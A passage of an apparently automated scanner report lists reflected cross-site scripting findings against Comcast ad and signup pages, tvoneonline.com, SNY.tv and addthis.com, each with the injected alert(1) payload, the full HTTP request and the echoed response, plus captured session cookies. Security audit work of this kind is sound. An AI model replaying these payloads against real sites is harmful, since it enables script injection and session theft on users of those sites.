The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d61ce"-alert(1)-"5ab7386432 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1440
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17/1279528946/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_
...[SNIP]...

2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798 was submitted in the REST URL parameter 9. This input was echoed as 70249"><img src=a onerror=alert(1)>74ca705f798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x3270249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1495
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/190952221/x3270249"><img src=a onerror=alert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1e9"><script>alert(1)</script>5881f5fc9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?9a1e9"><script>alert(1)</script>5881f5fc9eb=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1404
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1157883388/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&9a1e9"><script>alert(1)</script>5881f5fc9eb=1" WIDTH=2 HEIGHT=2>

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf35b"><script>alert(1)</script>49f7dfd6bf9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/ HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/1920876736/UNKNOWN/default/empty.gif/726e6e65456b7a75345934414371526a;zip=US:77002?x" target="_top">
...[SNIP]...

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e31"><script>alert(1)</script>df1925c3675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.net/?62e31"><script>alert(1)</script>df1925c3675=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 483
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a;zip=US:77002
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a?62e31"><script>alert(1)</script>df1925c3675=1" ALT="" BORDER="0">
...[SNIP]...

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://signup.comcast.net
Path:   /identity/reg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b994"><script>alert(1)</script>006d67d6e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1 HTTP/1.1
Host: signup.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.7
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: PlaxoLang=en; path=/; domain=.account.comcast.net
Set-Cookie: PlaxoCS=1624913714130882655; path=/; domain=.account.comcast.net
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="Content-Type" content="text/html; charset=utf-
...[SNIP]...
<form method="POST" action="https://signup.comcast.net/identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1" onsubmit="return validateSignup(this);" name="signupForm">
...[SNIP]...

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tvoneonline.com
Path:   /video/b_player.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dede"><script>alert(1)</script>a693329120d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1 HTTP/1.1
Host: tvoneonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>A Different World, Lincoln Heights, Love That Girl, Way Bl
...[SNIP]...
<form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1#comments_anchor" onsubmit="rememberfields()" style="display:none;">
...[SNIP]...

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /fan_zone/messageboard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fa0fc</script><script>alert(1)</script>644720c7edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fan_zone/messageboard/?fa0fc</script><script>alert(1)</script>644720c7edd=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct04-dc2
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 19 Dec 2010 18:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34231


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>Home | SNY.t
...[SNIP]...
section = "fan_zone";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/fan_zone/messageboard/']
   // requestQuery: fa0fc</script><script>alert(1)</script>644720c7edd=1        
   </script>
...[SNIP]...

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /media/video.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 40697</script><script>alert(1)</script>e05f1431920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/video.jsp?40697</script><script>alert(1)</script>e05f1431920=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: t01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7188
Expires: Sun, 19 Dec 2010 20:31:30 GMT
Date: Sun, 19 Dec 2010 18:31:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75019


                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
   var section = "video";
   var ctxPath = "";
   var pageid = "topic_video";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/media/video.jsp']
   // requestQuery: 40697</script><script>alert(1)</script>e05f1431920=1        
   </script>
...[SNIP]...

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/archive.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload ceb7c</script><script>alert(1)</script>8fba1b30fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/archive.jsp?ceb7c</script><script>alert(1)</script>8fba1b30fa7=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:26 GMT
Date: Sun, 19 Dec 2010 18:30:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42868


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY.tv: News<
...[SNIP]...
t">
   var section = "news";
   var ctxPath = "";
   var pageid = "archive";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/archive.jsp']
   // requestQuery: ceb7c</script><script>alert(1)</script>8fba1b30fa7=1        
   </script>
...[SNIP]...

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/columnist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 83b42</script><script>alert(1)</script>76f090a1843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/columnist.jsp?83b42</script><script>alert(1)</script>76f090a1843=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Content-Length: 30481
Connection: close


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY Columnis
...[SNIP]...
   var section = "news";
   var ctxPath = "";
   var pageid = "columnist";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/columnist.jsp']
   // requestQuery: 83b42</script><script>alert(1)</script>76f090a1843=1        
   </script>
...[SNIP]...

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /search/media.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload d5034</script><script>alert(1)</script>e5e8c9bf78b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/media.jsp?d5034</script><script>alert(1)</script>e5e8c9bf78b=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33552


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SN
...[SNIP]...
pt">
   var section = "media";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/search/media.jsp']
   // requestQuery: d5034</script><script>alert(1)</script>e5e8c9bf78b=1        
   </script>
...[SNIP]...

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3462"-alert(1)-"d0eff2b1478 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpa3462"-alert(1)-"d0eff2b1478 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cjihrpeovelp8v558shmush177; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpa3462"-alert(1)-"d0eff2b1478";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 866d9<script>alert(1)</script>f5c221fed4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php866d9<script>alert(1)</script>f5c221fed4c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n3ai0ab6isuvt5o8svci4rtgi2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php866d9<script>alert(1)</script>f5c221fed4c</strong>
...[SNIP]...

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
